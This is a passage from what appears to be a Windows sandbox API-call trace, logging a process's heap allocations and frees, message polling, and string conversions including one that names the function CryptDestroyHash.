lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69790 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0088.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0088.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0088.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0088.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0088.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0088.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e08 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c58 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f10 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c70 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0088.013] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e38 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73db8 [0088.013] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0088.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.014] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0088.014] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0088.014] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73db8 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0088.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.015] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7060 [0088.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0088.016] 